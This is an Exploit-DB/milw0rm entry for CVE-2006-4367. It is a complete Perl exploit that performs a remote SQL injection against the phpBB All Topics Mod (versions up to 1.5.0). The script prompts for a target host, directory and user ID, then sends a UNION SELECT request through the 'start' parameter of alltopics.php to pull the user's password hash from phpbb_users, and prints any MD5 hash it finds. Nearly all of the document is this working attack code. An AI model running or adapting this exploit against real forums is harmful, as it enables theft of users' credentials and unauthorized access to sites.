phpBB All Topics Mod <= 1.5.0 - start Remote SQL Injection Exploit

2006-08-23T00:00:00
ID EDB-ID:2248
Type exploitdb
Reporter SpiderZ
Modified 2006-08-23T00:00:00

Description

phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit. CVE-2006-4367. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

print q{
_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
        |  |  &gt;&lt;  |  |
        \  \      /  /
            '.__.'       


# Author: SpiderZ
# Exploit: All Topics Hack Sql injection
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
-------------------------------------------------------------------------
Mod download: http://www.phpbbhacks.com/download/2821
-------------------------------------------------------------------------
_________________________________________________________________________

}; 

use IO::Socket;

print q{
=&gt; Insert URL
=&gt; without ( http )
=&gt; };
$server = &lt;STDIN&gt;;
chop ($server);
print q{
=&gt; Insert directory
=&gt; es: /forum/ - /phpBB2/
=&gt; };
$dir = &lt;STDIN&gt;;
chop ($dir);
print q{
=&gt; User ID
=&gt; Number:
=&gt; };
$user = &lt;STDIN&gt;;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET-&gt;new(
Proto =&gt; "tcp",
PeerAddr =&gt; "$server",
PeerPort =&gt; "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = &lt;$socket&gt;)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

# milw0rm.com [2006-08-23]